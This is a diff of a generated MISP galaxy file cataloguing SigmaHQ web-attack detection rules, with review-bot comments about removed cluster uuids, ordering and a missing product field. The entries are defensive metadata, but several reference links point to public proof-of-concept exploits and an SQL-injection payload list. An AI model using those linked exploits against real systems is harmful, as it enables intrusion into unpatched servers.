@@ -83996,10 +80593,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml"
],
"tags": [
@@ -84629,10 +81226,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml"
],
"tags": [
@@ -84658,10 +81255,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml"
],
"tags": [
@@ -84681,6 +81278,40 @@
"uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2",
"value": "Azure Kubernetes Service Account Modified or Deleted"
},
+ {
+ "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2021/05/31",
+ "falsepositive": [
+ "Serious issues with a configuration or plugin"
+ ],
+ "filename": "web_nginx_core_dump.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps",
+ "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/nginx/web_nginx_core_dump.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1499.004"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56",
+ "value": "Nginx Core Dump"
+ },
{
"description": "Detects an issue in apache logs that reports threading related errors",
"meta": {
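Review bot: the new "Nginx Core Dump" entry sets "logsource.product": "No established product" although the rule path is rules/web/product/nginx/web_nginx_core_dump.yml; check whether the generator reads the rule's logsource block and, if the product is set there, emit it, because "No established product" leaves the cluster unfilterable by product. The entry is also inserted between the Azure Kubernetes entries and the Apache entries, so cluster order in the file does not follow the rule directory layout; a deterministic sort (by filename or uuid) would stop the insertion point from moving on the next regeneration.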
@@ -84735,41 +81366,6 @@
"uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1",
"value": "Apache Segmentation Fault"
},
- {
- "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2020/03/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/wugeej/status/1369476795255320580",
- "https://paper.seebug.org/1495/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_21978_vmware_view_planner_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.21978"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9",
- "value": "CVE-2021-21978 Exploitation Attempt"
- },
{
"description": "Detects common commands used in Windows webshells",
"meta": {
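Review bot: this hunk drops the cluster with uuid 77586a7f-7ea4-4c41-b19c-820140b84ca9 ("CVE-2021-21978 Exploitation Attempt") outright. Removing a galaxy cluster uuid breaks tags on MISP events that already reference it; the usual practice is to keep the entry and mark it deprecated, or to state in the PR why the upstream rule no longer exists. The removed metadata also carried "creation_date": "2020/03/10" for a 2021 CVE, which looks like an upstream typo and is moot once the entry is gone.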
@@ -84784,8 +81380,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://bad-jubies.github.io/RCE-NOW-WHAT/",
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
+ "https://bad-jubies.github.io/RCE-NOW-WHAT/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml"
],
"tags": [
@@ -84805,292 +81401,6 @@
"uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729",
"value": "Windows Webshell Strings"
},
- {
- "description": "Detects exploitation attempts on WebLogic servers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/11/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_14882_weblogic_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/sudo_sudoka/status/1323951871078223874",
- "https://isc.sans.edu/diary/26734",
- "https://twitter.com/jas502n/status/1321416053050667009?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.14882"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b",
- "value": "Oracle WebLogic Exploit CVE-2020-14882"
- },
- {
- "description": "Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection",
- "meta": {
- "author": "Sittikorn S, Nuttakorn T",
- "creation_date": "2022/12/13",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_26084_confluence_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md",
- "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
- "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/",
- "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_26084_confluence_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "38825179-3c78-4fed-b222-2e2166b926b1",
- "value": "Potential CVE-2021-26084 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_sonicwall_jarrewrite_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "6f55f047-112b-4101-ad32-43913f52db46",
- "value": "SonicWall SSL/VPN Jarrewrite Exploit"
- },
- {
- "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/03/03",
- "falsepositive": [
- "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related"
- ],
- "filename": "web_exchange_exploitation_hafnium.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2",
- "value": "Exchange Exploitation Used by HAFNIUM"
- },
- {
- "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/12/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_solarwinds_supernova_webshell.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.anquanke.com/post/id/226029",
- "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db",
- "value": "Solarwinds SUPERNOVA Webshell Access"
- },
- {
- "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/07/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2018_2894_weblogic_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/pyn3rd/status/1020620932967223296",
- "https://github.com/LandGrey/CVE-2018-2894",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "attack.persistence",
- "attack.t1505.003",
- "cve.2018.2894"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000",
- "value": "Oracle WebLogic Exploit"
- },
- {
- "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_8193_8195_citrix_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://support.citrix.com/article/CTX276688",
- "https://dmaasland.github.io/posts/citrix.html",
- "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7",
- "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195"
- },
- {
- "description": "Detects a successful Grafana path traversal exploitation",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/08",
- "falsepositive": [
- "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error"
- ],
- "filename": "web_cve_2021_43798_grafana.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/search?q=CVE-2021-43798",
- "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16",
- "value": "Grafana Path Traversal Exploitation CVE-2021-43798"
- },
{
"description": "Detects exploitation attempt using the JDNIExploiit Kit",
"meta": {
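Review bot: this hunk removes eight clusters (Oracle WebLogic Exploit CVE-2020-14882, Potential CVE-2021-26084 Exploitation Attempt, SonicWall SSL/VPN Jarrewrite Exploit, Exchange Exploitation Used by HAFNIUM, Solarwinds SUPERNOVA Webshell Access, Oracle WebLogic Exploit, Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195, Grafana Path Traversal Exploitation CVE-2021-43798), each with an established uuid and "related" links to ATT&CK technique uuids. A removal this large needs an explanation in the PR (whether the upstream rules left rules/web/webserver_generic or were retired), and the same uuid-stability concern applies: consumers that tagged events with these clusters lose resolution. If the rules still exist upstream under another directory, point the generator at that directory instead of dropping the entries.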
@@ -85104,8 +81414,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://githubmemory.com/repo/FunctFan/JNDIExploit",
"https://github.com/pimps/JNDI-Exploit-Kit",
+ "https://githubmemory.com/repo/FunctFan/JNDIExploit",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml"
],
"tags": "No established tags"
@@ -85113,121 +81423,10 @@
"uuid": "412d55bc-7737-4d25-9542-5b396867ce55",
"value": "JNDIExploit Pattern"
},
- {
- "description": "Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.",
- "meta": {
- "author": "@gott_cyber",
- "creation_date": "2022/12/11",
- "falsepositive": [
- "Vulnerability Scanners"
- ],
- "filename": "web_cve_2021_27905_apache_solr_exploit.yml",
- "level": "medium",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186",
- "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/",
- "https://twitter.com/sec715/status/1373472323538362371",
- "https://github.com/murataydemir/CVE-2021-27905",
- "https://twitter.com/Al1ex4/status/1382981479727128580",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_27905_apache_solr_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.27905"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0bbcd74b-0596-41a4-94a0-4e88a76ffdb3",
- "value": "Potential CVE-2021-27905 Exploitation Attempt"
- },
- {
- "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection",
- "meta": {
- "author": "@gott_cyber",
- "creation_date": "2022/08/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2022_27925_exploit.yml",
- "level": "medium",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
- "https://github.com/vnhacker1337/CVE-2022-27925-PoC",
- "https://www.yang99.top/index.php/archives/82/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_27925_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.27925"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd",
- "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE"
- },
- {
- "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/09/29",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/",
- "https://twitter.com/_0xf4n9x_/status/1572052954538192901",
- "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html",
- "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.36804"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685",
- "value": "Atlassian Bitbucket Command Injection Via Archive API"
- },
{
"description": "Detects SQL Injection attempts via GET requests in access logs",
"meta": {
- "author": "Saw Win Naung, Nasreddine Bencherchali",
+ "author": "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2020/02/22",
"falsepositive": [
"Java scripts and CSS Files",
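Review bot: Each of the three entries removed in this hunk (Solr CVE-2021-27905, Zimbra CVE-2022-27925, Bitbucket CVE-2022-36804) carries a stable `uuid` (0bbcd74b…, dd218fb6…, 65c0a0ab…) that MISP instances may already have applied as galaxy tags; dropping clusters silently leaves those tags dangling, so list the removed uuids in the PR description and check that no other cluster in the repository references them. The author string update on the SQL injection entry to "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems)" is a straightforward metadata sync and looks correct.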
@@ -85239,10 +81438,10 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://brightsec.com/blog/sql-injection-payloads/",
- "https://github.com/payloadbox/sql-injection-payload-list",
- "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/",
"https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/",
+ "https://brightsec.com/blog/sql-injection-payloads/",
+ "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/",
+ "https://github.com/payloadbox/sql-injection-payload-list",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml"
],
"tags": "No established tags"
@@ -85250,247 +81449,6 @@
"uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453",
"value": "SQL Injection Strings"
},
- {
- "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/12/22",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "web_exchange_owassrf_poc_exploitation.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw",
- "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/",
- "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "92d78c63-5a5c-4c40-9b60-463810ffb082",
- "value": "OWASSRF Exploitation Attempt Using Public POC - Webserver"
- },
- {
- "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_26814_wzuh_rce.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.21978",
- "cve.2021.26814"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3",
- "value": "Exploitation of CVE-2021-26814 in Wazuh"
- },
- {
- "description": "Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2023/02/23",
- "falsepositive": [
- "Vulnerability scanners"
- ],
- "filename": "web_cve_2023_23752_joomla_exploit_attempt.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/momika233/status/1626464189261942786",
- "https://xz.aliyun.com/t/12175",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2023_23752_joomla_exploit_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2023.23752"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0e1ebc5a-15d0-4bf6-8199-b2535397433a",
- "value": "Potential CVE-2023-23752 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/12/22",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_exchange_owassrf_exploitation.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/",
- "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "181f49fa-0b21-4665-a98c-a57025ebb8c7",
- "value": "Potential OWASSRF Exploitation Attempt - Webserver"
- },
- {
- "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/31",
- "falsepositive": [
- "Serious issues with a configuration or plugin"
- ],
- "filename": "web_nginx_core_dump.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "No established product",
- "refs": [
- "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps",
- "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_nginx_core_dump.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1499.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56",
- "value": "Nginx Core Dump"
- },
- {
- "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)",
- "meta": {
- "author": "Sittikorn S",
- "creation_date": "2021/06/29",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html",
- "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_22893_pulse_secure_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5525edac-f599-4bfd-b926-3fa69860e766",
- "value": "Pulse Connect Secure RCE Attack CVE-2021-22893"
- },
- {
- "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n",
- "meta": {
- "author": "Subhash Popuri (@pbssubhash)",
- "creation_date": "2021/08/25",
- "falsepositive": [
- "Scanning from Nuclei",
- "Unknown"
- ],
- "filename": "web_cve_2010_5278_exploitation_attempt.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/projectdiscovery/nuclei-templates",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2010_5278_exploitation_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61",
- "value": "CVE-2010-5278 Exploitation Attempt"
- },
{
